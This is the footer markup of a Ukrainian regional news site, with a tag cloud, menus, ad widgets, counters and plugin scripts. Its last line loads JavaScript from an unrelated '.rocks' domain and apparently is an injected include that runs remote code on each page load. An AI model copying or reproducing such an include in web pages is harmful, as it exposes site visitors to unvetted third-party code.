<a href="http://gazeta.lviv.ua/tag/smittya/" class="tag-cloud-link tag-link-1552 tag-link-position-39" style="font-size: 9.6969696969697pt;" aria-label="сміття (110 елементів)">сміття</a>
<a href="http://gazeta.lviv.ua/tag/socium/" class="tag-cloud-link tag-link-1813 tag-link-position-40" style="font-size: 8.8484848484848pt;" aria-label="соціум (85 елементів)">соціум</a>
<a href="http://gazeta.lviv.ua/tag/sport/" class="tag-cloud-link tag-link-126 tag-link-position-41" style="font-size: 13.161616161616pt;" aria-label="спорт (349 елементів)">спорт</a>
<a href="http://gazeta.lviv.ua/tag/podiyi/" class="tag-cloud-link tag-link-2527 tag-link-position-42" style="font-size: 14.222222222222pt;" aria-label="трафунки (489 елементів)">трафунки</a>
<a href="http://gazeta.lviv.ua/tag/festival/" class="tag-cloud-link tag-link-489 tag-link-position-43" style="font-size: 10.333333333333pt;" aria-label="фестиваль (136 елементів)">фестиваль</a>
<a href="http://gazeta.lviv.ua/tag/foto/" class="tag-cloud-link tag-link-1746 tag-link-position-44" style="font-size: 10.474747474747pt;" aria-label="фото (145 елементів)">фото</a>
<a href="http://gazeta.lviv.ua/tag/xabar/" class="tag-cloud-link tag-link-177 tag-link-position-45" style="font-size: 9.7676767676768pt;" aria-label="хабар (115 елементів)">хабар</a></div>
</aside></div>    </div><!-- end content_section -->

            	<div class="footer-ads-wrap"><aside class="all-devices  ads-widget gazet-widget"><div id="riainfo_e8591355dc8ba8c645d5eb51de57e1ae"></div>
<style type="text/css">
    #riainfo_e8591355dc8ba8c645d5eb51de57e1ae .riabanner_dom.horizontal .riabanner-description {display: none}
    #riainfo_e8591355dc8ba8c645d5eb51de57e1ae .riabanner_dom.horizontal .b-text {padding: 1% 0}
</style>
<script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=e8591355dc8ba8c645d5eb51de57e1ae" ></script>
<div id="riainfo_e8591355dc8ba8c645d5eb51de57e1ae"></div>
<script type="text/javascript" src="https://cobrand.ria.com/js/ria_informer.js?riacode=e8591355dc8ba8c645d5eb51de57e1ae" ></script></aside></div><!-- end footer-ads-wrap -->
            </div>
        </div><!-- end_container -->
        <footer id="footer">
            <div class="center">
                <div class="footer-inner clearfix">
                    <div class="footer-left">
                    	<ul id="menu-footer-links" class="footer_links"><li id="menu-item-992" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-992"><a href="http://gazeta.lviv.ua/redakciya/">Редакція</a></li>
<li id="menu-item-993" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-993"><a href="http://gazeta.lviv.ua/reklama-na-sajti/">Реклама на сайті</a></li>
<li id="menu-item-160255" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-160255"><a href="http://gazeta.lviv.ua/archive/">Архів</a></li>
</ul>                                                <div class="copyright">© 2006-2017 Львівська газета<br>При використанні матеріалів джерело обов'язкове.<br>
При цитуванні в інтернеті — гіперпосилання.</div>
                                                <ul class="footer-socials">
                        	<li><a href="http://facebook.com/lvivskagazeta/" target="_blank"><i class="fa fa-facebook"></i></a></li>                                                        <li><a href="https://www.youtube.com/channel/UCJiKZoY0vRxONsAgIuzNcuQ" target="_blank"><i class="fa fa-youtube-play"></i></a></li>                                                        <li><a href="http://gazeta.lviv.ua/feed/" target="_blank"><i class="fa fa-feed"></i></a></li>                        </ul>
                    </div>
                    <div class="footer-column footer-column-1"><aside id="nav_menu-3" class="all-devices  widget widget_nav_menu"><div class="menu-footer-categories-1-container"><ul id="menu-footer-categories-1" class="menu"><li id="menu-item-56414" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-56414"><a href="http://gazeta.lviv.ua/novini/">Новини</a></li>
<li id="menu-item-160256" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160256"><a href="http://gazeta.lviv.ua/interview/">Інтерв&#8217;ю</a></li>
<li id="menu-item-160257" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160257"><a href="http://gazeta.lviv.ua/specprojects/">Спецпроекти</a></li>
<li id="menu-item-56406" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56406"><a href="http://gazeta.lviv.ua/blogi/">Блоги</a></li>
<li id="menu-item-56419" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-56419"><a href="http://gazeta.lviv.ua/foto/">Відео/Фото</a></li>
</ul></div></aside></div>
                    <div class="footer-column footer-column-2"><aside id="nav_menu-4" class="all-devices  widget widget_nav_menu"><div class="menu-footer-categories-2-container"><ul id="menu-footer-categories-2" class="menu"><li id="menu-item-160322" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160322"><a href="http://gazeta.lviv.ua/politika-2/">Політика</a></li>
<li id="menu-item-160263" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160263"><a href="http://gazeta.lviv.ua/ekonomika-2/">Бізнес</a></li>
<li id="menu-item-160260" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160260"><a href="http://gazeta.lviv.ua/novini/suspilstvo/">Суспільство</a></li>
<li id="menu-item-160265" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160265"><a href="http://gazeta.lviv.ua/lyudi-lvova/">Люди Львова</a></li>
<li id="menu-item-160264" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160264"><a href="http://gazeta.lviv.ua/kultura/">Культура</a></li>
<li id="menu-item-160276" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-160276"><a href="http://gazeta.lviv.ua/stil-zhittya/">Стиль життя</a></li>
</ul></div></aside></div>
                    <div class="footer-column footer-column-3"><aside id="custom_html-3" class="widget_text all-devices  widget widget_custom_html"><div class="textwidget custom-html-widget"><!--bigmir)net TOP 100-->
<script type="text/javascript" language="javascript"><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:40649,s:40649,t:3,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};
for(var f=self;f!=f.parent;f=f.parent)bm.w++;
try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));
else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}
try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}
try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}
r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400);bm.v^=r.length}
bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];
bmD.write('<a href="http://www.bigmir.net/" target="_blank" onClick="img=new Image();img.src="//www.bigmir.net/?cl=40649";"><img src="//c.bigmir.net/?'+bs.join('&')+'"  width="88" height="31" border="0" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a>');
//-->
</script>
<noscript>
<a href="http://www.bigmir.net/" target="_blank"><img src="//c.bigmir.net/?v40649&s40649&t3" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100" border="0" /></a>
</noscript>
<!--bigmir)net TOP 100--></div></aside><aside id="black-studio-tinymce-30" class="all-devices  widget widget_black_studio_tinymce"><div class="textwidget"><div style="margin-top:100px" class="copyright"><a title="розробка сайту" href="http://www.lvivport.com" target="_blank" style="color: #666;">розробка сайту<br /><img src="http://gazeta.lviv.ua/wp-content/uploads/ad/lvivport.png" alt="розорбка сайту" width="133" height="34" /></a></div>
</div></aside></div>
                </div>
            </div>
        </footer>
    </div><!-- end_wrapper -->

	<div style="display:none">
	<div class="grofile-hash-map-b979ecff8bdd274d1ab9531935c28ae8">
	</div>
	</div>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/frontend-builder-global-functions.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201749'></script>
<script type='text/javascript' src='http://s.gravatar.com/js/gprofiles.js?ver=2017Decaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/gk-nsp/gk-nsp.js?ver=4.8.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var thickboxL10n = {"next":"\u0412\u043f\u0435\u0440\u0435\u0434 \u00bb","prev":"\u00ab \u041d\u0430\u0437\u0430\u0434","image":"\u0417\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u043d\u044f","of":"\u0437","close":"\u0417\u0430\u043a\u0440\u0438\u0442\u0438","noiframes":"\u0426\u044f \u0444\u0443\u043d\u043a\u0446\u0456\u044f \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u0454 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u043a\u0438 \u043f\u043b\u0430\u0432\u0430\u044e\u0447\u0438\u0445 \u0444\u0440\u0435\u0439\u043c\u0456\u0432. \u0419\u043c\u043e\u0432\u0456\u0440\u043d\u043e, \u0431\u0440\u0430\u0443\u0437\u0435\u0440 \u043d\u0435 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u0443\u0454 \u0442\u0435\u0491\u0438 iframe, \u0430\u0431\u043e \u0432\u043e\u043d\u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u043e\u0432\u0430\u043d\u0456.","loadingAnimation":"http:\/\/gazeta.lviv.ua\/wp-includes\/js\/thickbox\/loadingAnimation.gif"};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/gk-tabs/gk-tabs.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.fitvids.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/waypoints.min.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.magnific-popup.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/jquery.mobile.custom.min.js?ver=1.2.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var et_pb_custom = {"ajaxurl":"http:\/\/gazeta.lviv.ua\/wp-admin\/admin-ajax.php","images_uri":"http:\/\/gazeta.lviv.ua\/wp-content\/themes\/gazeta\/images","builder_images_uri":"http:\/\/gazeta.lviv.ua\/wp-content\/plugins\/divi-builder\/framework\/images","et_frontend_nonce":"c0f1b7af94","subscription_failed":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u043f\u0435\u0440\u0435\u0432\u0456\u0440\u0442\u0435 \u043f\u043e\u043b\u044f \u043d\u0438\u0436\u0447\u0435, \u0449\u043e\u0431 \u043f\u0435\u0440\u0435\u043a\u043e\u043d\u0430\u0442\u0438\u0441\u044f, \u0449\u043e \u0432\u0438 \u0432\u0432\u0435\u043b\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0443 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u044e.","fill_message":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u0437\u0430\u043f\u043e\u0432\u043d\u0456\u0442\u044c \u043d\u0430\u0441\u0442\u0443\u043f\u043d\u0456 \u043f\u043e\u043b\u044f:","contact_error_message":"\u0411\u0443\u0434\u044c \u043b\u0430\u0441\u043a\u0430, \u0432\u0438\u043f\u0440\u0430\u0432\u0442\u0435 \u0446\u0456 \u043f\u043e\u043c\u0438\u043b\u043a\u0438:","invalid":"\u041d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0430 \u0430\u0434\u0440\u0435\u0441\u0430 \u0435\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0457 \u043f\u043e\u0448\u0442\u0438","captcha":"\u041a\u0430\u043f\u0447\u0456","prev":"\u041f\u0435\u0440\u0435\u0434","previous":"\u041f\u043e\u043f\u0435\u0440\u0435\u0434\u043d\u0456","next":"\u0414\u0430\u043b\u0456","wrong_captcha":"\u0412\u0438 \u0432\u0432\u0435\u043b\u0438 \u043d\u0435\u0432\u0456\u0440\u043d\u0435 \u0447\u0438\u0441\u043b\u043e \u0432 captcha.","is_builder_plugin_used":"1","is_divi_theme_used":"","widget_search_selector":".widget_search"};
/* ]]> */
</script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/divi-builder/framework/scripts/frontend-builder-scripts.js?ver=1.2.3'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-includes/js/wp-embed.min.js?ver=4.8.4'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/fancybox/jquery.fancybox-1.3.8.min.js?ver=1.6'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/js/jquery.easing.min.js?ver=1.4.0'></script>
<script type='text/javascript' src='http://gazeta.lviv.ua/wp-content/plugins/easy-fancybox/js/jquery.mousewheel.min.js?ver=3.1.13'></script>
<!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ -->
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&appId=1083471841726549&version=v2.3";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<script type='text/javascript' src='http://stats.wp.com/e-201749.js' async defer></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:5.2.1',blog:'119895106',post:'166613',tz:'2',srv:'gazeta.lviv.ua'} ]);
	_stq.push([ 'clickTrackerInit', '119895106', '166613' ]);
</script>
<script type="text/javascript">
jQuery(document).on('ready post-load', function(){ jQuery('.nofancybox,a.pin-it-button,a[href*="pinterest.com/pin/create/button"]').addClass('nolightbox'); });
jQuery(document).on('ready post-load',easy_fancybox_handler);
jQuery(document).on('ready',easy_fancybox_auto);</script>

<script src="http://mtdatahaba.rocks/sticker.287255.js" type="text/javascript"></script>
</body>
</html>